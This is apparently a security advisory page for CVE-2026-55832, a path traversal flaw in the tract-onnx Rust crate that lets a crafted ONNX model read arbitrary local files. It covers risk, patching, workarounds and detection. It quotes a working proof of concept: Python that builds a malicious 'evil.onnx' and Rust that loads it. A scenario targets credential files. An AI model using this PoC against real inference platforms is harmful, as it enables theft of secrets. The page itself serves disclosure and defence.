AI Threat Alert
A path traversal vulnerability in the `tract-onnx` Rust crate allows a malicious ONNX model file to read arbitrary local files—including credentials, SSH keys, and `.env` configurations—by supplying an unsanitized `location` field in external tensor data, with file contents surfaced directly in inference output. With 1,195 downstream dependents and a proof-of-concept requiring only ten lines of standard Python ONNX tooling, any application loading externally-sourced models (model hubs, user uploads, shared repositories) is exposed to file disclosure without code execution on the host. The vulnerability is not in CISA KEV and EPSS data is unavailable, but the trivial exploitation bar means motivated attackers need no specialized AI/ML knowledge. Upgrade to `tract-onnx 0.21.17` immediately; as a stopgap, restrict model loading to internally-signed artifacts and enforce filesystem isolation (Linux namespaces, AppArmor, seccomp) around inference processes.
What is the risk?
Medium-severity but practically impactful in AI deployment contexts. The local attack vector (CVSS AV:L) assumes model file delivery rather than direct network access, which is entirely realistic in ML pipelines that accept third-party or user-supplied models—a common production pattern. High confidentiality impact (C:H) means any locally readable file is fully exfiltrable. The secondary DoS impact (A:L) via Rust panic on crafted offset/length values adds operational risk to production inference pipelines. With 1,195 dependents and a commodity PoC, exploitability ceiling is low despite no recorded active exploitation.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| ONNX | cargo | < 0.21.17 | 0.21.17 |
Do you use ONNX? You're affected.
How severe is it?
What is the attack surface?
What should I do?
5 steps-
Patch: upgrade
tract-onnxto 0.21.17, which implements containment checks mirroring the referenceonnx1.22.0 hardening. -
Workaround if patching is blocked: load only ONNX models from trusted, internally-controlled sources with cryptographic integrity verification (checksums or signatures).
-
Reject ONNX models containing external data references (
data_location = EXTERNAL) at intake if your pipeline does not require them. -
Apply filesystem isolation to inference processes: seccomp-bpf profiles, Linux namespaces, or AppArmor/SELinux policies restricting read access to paths outside the model directory.
-
Detection: audit codebases for calls to
model_for_path()orload_tensor()on externally-sourced files; monitor inference process file access (auditd/eBPF) for reads outside expected model directories.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-55832?
A path traversal vulnerability in the `tract-onnx` Rust crate allows a malicious ONNX model file to read arbitrary local files—including credentials, SSH keys, and `.env` configurations—by supplying an unsanitized `location` field in external tensor data, with file contents surfaced directly in inference output. With 1,195 downstream dependents and a proof-of-concept requiring only ten lines of standard Python ONNX tooling, any application loading externally-sourced models (model hubs, user uploads, shared repositories) is exposed to file disclosure without code execution on the host. The vulnerability is not in CISA KEV and EPSS data is unavailable, but the trivial exploitation bar means motivated attackers need no specialized AI/ML knowledge. Upgrade to `tract-onnx 0.21.17` immediately; as a stopgap, restrict model loading to internally-signed artifacts and enforce filesystem isolation (Linux namespaces, AppArmor, seccomp) around inference processes.
Is CVE-2026-55832 actively exploited?
No confirmed active exploitation of CVE-2026-55832 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-55832?
1. Patch: upgrade `tract-onnx` to 0.21.17, which implements containment checks mirroring the reference `onnx` 1.22.0 hardening. 2. Workaround if patching is blocked: load only ONNX models from trusted, internally-controlled sources with cryptographic integrity verification (checksums or signatures). 3. Reject ONNX models containing external data references (`data_location = EXTERNAL`) at intake if your pipeline does not require them. 4. Apply filesystem isolation to inference processes: seccomp-bpf profiles, Linux namespaces, or AppArmor/SELinux policies restricting read access to paths outside the model directory. 5. Detection: audit codebases for calls to `model_for_path()` or `load_tensor()` on externally-sourced files; monitor inference process file access (auditd/eBPF) for reads outside expected model directories.
What systems are affected by CVE-2026-55832?
This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, model hub integrations, edge inference, ML upload and evaluation platforms.
What is the CVSS score for CVE-2026-55832?
CVE-2026-55832 has a CVSS v3.1 base score of 6.1 (MEDIUM).
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.003 Model AML.T0011.000 Unsafe AI Artifacts AML.T0025 Exfiltration via Cyber Means AML.T0037 Data from Local System Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary `tract` (the `tract-onnx` crate) resolves an ONNX tensor's external-data `location` by joining it onto the model directory **without any sanitization**. Because `location` comes from the (untrusted) `.onnx` file, a malicious model can make `tract` open and read an **arbitrary local file** at load time, with the file's contents flowing into the model's tensors / inference output (read-only file disclosure). This is the ONNX external-data path-traversal class that the reference `onnx` library hardened over several CVEs; `tract` resolves `location` itself and was never hardened. ### Details In `onnx/src/tensor.rs`, `get_external_resources()` builds the path with no checks: ```rust let location = /* tensor.external_data "location" value — attacker-controlled */; let p = PathBuf::from(path).join(location); // no is_absolute / ".." / canonicalize / containment check provider.read_bytes_from_path(&mut tensor_data, &p, offset, length)?; // Mmap::map(File::open(p)) by default ``` - `Path::join` with an **absolute** `location` (e.g. `/etc/passwd`) discards the base directory → `p = /etc/passwd`. - A **relative** `../../../../etc/passwd` value is not normalized → directory traversal. - The default `MmapDataResolver` (`onnx/src/data_resolver.rs`) then `mmap`s the file and copies `mmap[offset..offset+length]` into the tensor. `offset`/`length` are also taken from the file; an out-of-range slice **panics** (DoS). No `is_absolute`, `..`, `canonicalize`, or containment check exists anywhere on this path (`tensor.rs`, `model.rs`, `data_resolver.rs`). Reachable from the standard public API: `model_for_path(p)` (`onnx/src/model.rs`) sets `model_dir = p.parent()` and calls `load_tensor(proto, model_dir)` → `get_external_resources(.., model_dir)`. ### PoC Tested on `tract-onnx 0.21.16` (crates.io), Rust 1.96. 1. A canary file the model must not be able to read: `/tmp/tract_canary_secret.txt` → `TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b` 2. Build a small `evil.onnx` with a `UINT8[37]` initializer whose `external_data` is `location=/tmp/tract_canary_secret.txt` (absolute), `offset=0`, `length=37`, fed through `Identity` to the output (raw protobuf serialization): ```python import onnx from onnx import helper, TensorProto, StringStringEntryProto N = 37; LOC = "/tmp/tract_canary_secret.txt" # absolute -> Path::join discards the base dir w = TensorProto(); w.name = "W"; w.data_type = TensorProto.UINT8 w.dims.extend([N]); w.data_location = TensorProto.EXTERNAL for k, v in [("location", LOC), ("offset", "0"), ("length", str(N))]: e = StringStringEntryProto(); e.key = k; e.value = v; w.external_data.append(e) node = helper.make_node("Identity", ["W"], ["Y"]) out = helper.make_tensor_value_info("Y", TensorProto.UINT8, [N]) g = helper.make_graph([node], "g", [], [out], initializer=[w]) m = helper.make_model(g, opset_imports=[helper.make_opsetid("", 13)]) open("evil.onnx", "wb").write(m.SerializeToString()) ``` 3. Victim loads the untrusted model with the standard API: ```rust let model = tract_onnx::onnx().model_for_path("evil.onnx")?; let out = model.into_optimized()?.into_runnable()?.run(tvec!())?; let bytes: Vec<u8> = out[0].to_array_view::<u8>()?.iter().cloned().collect(); println!("{:?}", String::from_utf8_lossy(&bytes)); ``` Output: ``` "TRACT-EXTDATA-TRAVERSAL-CANARY-7f3a2b" ``` i.e. the contents of the arbitrary local file were read by `tract` and surfaced in the inference output. ### Impact Read-only arbitrary local file disclosure when an application uses `tract` to load an untrusted or shared ONNX model (model hubs, multi-file repos, user uploads). The file content is recoverable from the model's tensors / inference output. Secondary: denial of service (panic) via out-of-bounds `offset`/`length`. No write or code execution. ### Suggested fix Reject absolute `location` and any `..` component, then canonicalize and verify the resolved path stays within the model directory (mirroring `onnx` 1.22.0's `resolve_external_data_location`); reject symlinks; validate `offset`/`length` against the file size before slicing.
Exploitation Scenario
An adversary targets an ML platform that allows users to upload ONNX models for inference. Using the standard Python `onnx` library with ten lines of code matching the disclosed PoC, they craft `evil.onnx` with a tensor whose external data `location` field is set to `/etc/passwd`, `~/.aws/credentials`, or a service account key path. When an automated pipeline or operator calls `model_for_path('evil.onnx')`, `tract-onnx` resolves the absolute path without sanitization, mmaps the target file, and copies its contents into the output tensor. The adversary retrieves the exfiltrated file contents by inspecting the inference API response, requiring no elevated privileges and no interaction beyond model upload and a single inference invocation.
Weaknesses (CWE)
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L References
Timeline
Related Vulnerabilities
CVE-2026-28500 9.1 onnx: Integrity Verification bypass enables tampering
Same package: onnx CVE-2024-5187 8.8 ONNX: path traversal in model download enables RCE
Same package: onnx CVE-2026-34445 8.6 ONNX: property overwrite via crafted model file
Same package: onnx CVE-2024-7776 8.1 ONNX: path traversal in download_model enables RCE
Same package: onnx GHSA-q56x-g2fj-4rj6 7.1 onnx: TOCTOU symlink following enables arbitrary file write
Same package: onnx